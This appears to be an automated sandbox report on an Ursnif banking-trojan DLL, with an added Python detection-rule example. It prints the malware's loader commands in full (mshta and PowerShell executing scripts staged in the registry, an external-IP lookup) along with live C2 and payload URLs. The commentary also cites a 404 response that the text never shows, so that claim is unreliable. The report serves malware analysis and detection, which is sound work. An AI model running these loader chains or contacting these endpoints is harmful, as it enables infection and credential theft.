

Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Sample Name: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
Analysis ID: 353281
MD5: f76b81b0397ae313b8f6d19d95c49edf
SHA1: 8f15106b524cc5db564845508a04ee3bf2709949
SHA256: 3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY in the browser (drops it back to plain HTTP/1.1 so web injects can modify the traffic)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5576 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll' MD5: 8081BC925DFC69D40463079233C90FA5)
    • regsvr32.exe (PID: 5876 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5528 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6488 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 1380 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6192 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6940 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4136 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6124 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6908 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

The "time" value 1613433491 is a Unix timestamp (2021-02-15 23:58:11 UTC); it matches the Date header of the HTTP 404 response captured in the network traffic below, so the beacon fields were filled in at submission time rather than hard-coded.

Yara Overview

Memory Dumps

Source / Rule / Description / Author / Strings
  • 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp: JoeSecurity_Ursnif (Yara detected Ursnif), Joe Security
  • 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp: Gozi (Rule Win32.Gozi), CCN-CERT
      0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ... (UTF-16LE "cookies.sqlite-j...", the Firefox cookie database and its journal)
  • 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp: JoeSecurity_Ursnif (Yara detected Ursnif), Joe Security
  • 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp: JoeSecurity_Ursnif (Yara detected Ursnif), Joe Security
  • 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp: JoeSecurity_Ursnif (Yara detected Ursnif), Joe Security
  (30 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', ProcessId: 4136
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5424
Sigma detected: Suspicious Rundll32 Activity
Source: Process started; Author: juju4; Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5528, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6488
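The Startup tree and the three Sigma hits above describe the same chain: mshta.exe pulls a script out of HKCU\Software\AppDataLow, spawns PowerShell, which reads a second value from the same key and compiles C# out of the user's Temp directory, while the injected explorer.exe runs an external-IP lookup through nslookup. The block below is an added example (not the Sigma rules' own text and not sandbox code) that turns those observations into simple process-creation rules and runs them over events constructed from the command lines in this report; the rule logic is a simplification, and the two benign control events (PIDs 9001 and 9002) are invented to show what does not fire.

```python
"""Simplified process-creation rules for the parent/child pairs in this report.
Added example: rules are my own reduction of the behaviour, not the Sigma rule
bodies; events mirror Sysmon EID 1 / Windows 4688 fields and are constructed
from the report's Startup tree (PIDs 9001/9002 are invented benign controls)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # "" when the parent is not in the log


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def _base(path: str) -> str:
    """Case-folded file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def mshta_spawns_shell(e: ProcEvent) -> bool:
    return _base(e.parent_image) == "mshta.exe" and _base(e.image) in SHELLS


def dotnet_compiler_from_temp(e: ProcEvent) -> bool:
    # csc.exe/vbc.exe driven by a response file that lives under a user's Temp dir
    return _base(e.image) in {"csc.exe", "vbc.exe"} and bool(
        re.search(r"\\AppData\\Local\\Temp\\", e.cmdline, re.I))


def rundll32_control_rundll(e: ProcEvent) -> bool:
    return _base(e.image) == "rundll32.exe" and "control_rundll" in e.cmdline.lower()


def script_staged_in_registry(e: ProcEvent) -> bool:
    # payload kept under HKCU\Software\AppDataLow and read back with
    # WScript.Shell.RegRead (mshta) or Get-ItemProperty / gp (powershell)
    c = e.cmdline.lower()
    return "appdatalow" in c and (
        "regread(" in c or re.search(r"\b(gp|get-itemproperty)\b", c) is not None)


def external_ip_lookup(e: ProcEvent) -> bool:
    c = e.cmdline.lower()
    return "nslookup" in c and "myip.opendns.com" in c


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "mshta_spawns_shell": mshta_spawns_shell,
    "dotnet_compiler_from_temp": dotnet_compiler_from_temp,
    "rundll32_control_rundll": rundll32_control_rundll,
    "script_staged_in_registry": script_staged_in_registry,
    "external_ip_lookup": external_ip_lookup,
}


def evaluate(events: Iterable[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every rule that fires on every event."""
    return [(name, e.pid) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed from the report's Startup tree (command lines copied as shown there).
SAMPLE_EVENTS = [
    ProcEvent(6488, r"C:\Windows\System32\rundll32.exe",
              r"'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h",
              r"C:\Windows\System32\control.exe"),
    ProcEvent(492, r"C:\Windows\System32\mshta.exe",
              r"'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'",
              ""),  # parent not shown in the report
    ProcEvent(5424, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))",
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(4136, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline'",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(6908, r"C:\Windows\System32\cmd.exe",
              r"cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1'",
              r"C:\Windows\explorer.exe"),
    # invented benign controls: a build-tree compile and an ordinary cmd
    ProcEvent(9001, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"csc.exe /noconfig @C:\Projects\app\obj\build.rsp",
              r"C:\Program Files\dotnet\MSBuild.exe"),
    ProcEvent(9002, r"C:\Windows\System32\cmd.exe", r"cmd /c dir C:\Users\user",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, pid in evaluate(SAMPLE_EVENTS):
        print(f"{name:28s} pid={pid}")
```

The registry rule is the one worth keeping after this report: the HKCU\Software\AppDataLow\Software\Microsoft\<GUID> key holds both the mshta bootstrap value (Actidsrv) and the PowerShell stage (basebapi), so a hunt over that key on the host recovers the stages without a memory dump.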

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.dat; Avira URL Cloud: Label: phishing
Found malware configuration
Source: regsvr32.exe.5876.2.memstr; Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at; Virustotal: Detection: 8%
Source: api3.lepini.at; Virustotal: Detection: 10%
Source: api10.laptok.at; Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll; Virustotal: Detection: 16%
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll; ReversingLabs: Detection: 10%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe; File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown; HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
Binary contains paths to debug symbols
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_033F3512
Source: C:\Windows\explorer.exe; Code function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor, 32_2_04DB7500
Source: C:\Windows\explorer.exe; Code function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 32_2_04DBAACC
Source: global traffic; HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Host: c56.lepini.at
Source: Joe Sandbox View; IP Address: 104.20.184.68
Source: Joe Sandbox View; IP Address: 151.101.1.44
Source: Joe Sandbox View; ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: Joe Sandbox View; JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic; HTTP traffic detected: GET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: api10.laptok.at; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Host: api10.laptok.at; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: api10.laptok.at; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1; Accept: */*; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Host: api10.laptok.at; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1; Accept: text/html, application/xhtml+xml, image/jxr, */*; Accept-Language: en-US; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Accept-Encoding: gzip, deflate; Host: api10.laptok.at; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Host: c56.lepini.at
Source: global traffic; HTTP traffic detected: GET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0; Host: api3.lepini.at
Source: global traffic; HTTP traffic detected: GET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0; Host: api3.lepini.at
Source: unknown; DNS traffic detected: queries for: www.msn.com
Source: unknown; HTTP traffic detected: POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0; Content-Length: 2; Host: api3.lepini.at
